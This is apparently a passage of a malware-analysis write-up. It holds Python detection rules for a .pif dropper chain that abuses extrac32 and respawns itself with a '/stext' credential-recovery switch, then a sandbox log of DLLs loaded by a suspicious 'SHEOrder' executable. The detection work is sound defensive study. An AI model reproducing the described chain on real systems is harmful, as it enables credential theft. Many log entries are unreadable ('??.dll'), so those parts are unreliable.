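    """A .pif that the loader executes as a PE; the extension hides it from casual review."""
    return PureWindowsPath(ev["image"]).suffix.lower() == ".pif"


def rule_extrac32_copy(ev: dict) -> bool:
    """extrac32.exe /C /Y <src> <dst> copies a plain file (LOLBAS stand-in for copy)."""
    tokens = ev["cmd"].lower().split()
    return (PureWindowsPath(ev["image"]).name.lower() == "extrac32.exe"
            and "/c" in tokens and "/y" in tokens)


def rule_cmdline_touches_public(ev: dict) -> bool:
    """Any argument that names a path under C:\\Users\\Public."""
    return _PUBLIC_RE.search(ev["cmd"]) is not None


def rule_self_spawn_stext(ev: dict, by_pid: Dict[int, dict]) -> bool:
    """Process launches its own image with /stext <file>: the recovery-module
    pattern the report shows three times under lhgtogaW.pif."""
    parent = by_pid.get(ev["ppid"])
    return (parent is not None
            and parent["image"].lower() == ev["image"].lower()
            and _STEXT_RE.search(ev["cmd"]) is not None)


def evaluate(events: List[dict]) -> Dict[int, List[str]]:
    """Map pid -> names of the rules that fired; pids with no hits are omitted."""
    by_pid = {ev["pid"]: ev for ev in events}
    findings: Dict[int, List[str]] = {}
    for ev in events:
        hits = []
        if rule_image_in_public(ev):
            hits.append("image_in_public")
        if rule_pif_image(ev):
            hits.append("pif_image")
        if rule_extrac32_copy(ev):
            hits.append("extrac32_copy")
        if rule_cmdline_touches_public(ev):
            hits.append("cmdline_touches_public")
        if rule_self_spawn_stext(ev, by_pid):
            hits.append("self_spawn_stext")
        if hits:
            findings[ev["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in evaluate(EVENTS).items():
        print(pid, ", ".join(hits))
```

The public-folder rules fire on some legitimate installers on their own, so the signal here is the composite: a .pif executing from C:\Users\Public, written there by extrac32, that then spawns itself with /stext. Alert on the chain, and use the single-rule hits to rank the rest of the tree.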
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: url.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: amsi.dll (7 consecutive identical entries collapsed)
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: endpointdlp.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: eamsi.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: amsi.dll (5 consecutive identical entries collapsed)
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: amsi.dll (34 consecutive identical entries collapsed)
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: am.dll (48 consecutive identical entries collapsed)
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: amsi.dll (46 consecutive identical entries collapsed)
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: am.dll (2 consecutive identical entries collapsed)
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: amsi.dll (22 consecutive identical entries collapsed)
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Section loaded: amsi.dll (4 consecutive identical entries collapsed)
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: Window Recorder - Window detected: More than 3 window changes detected
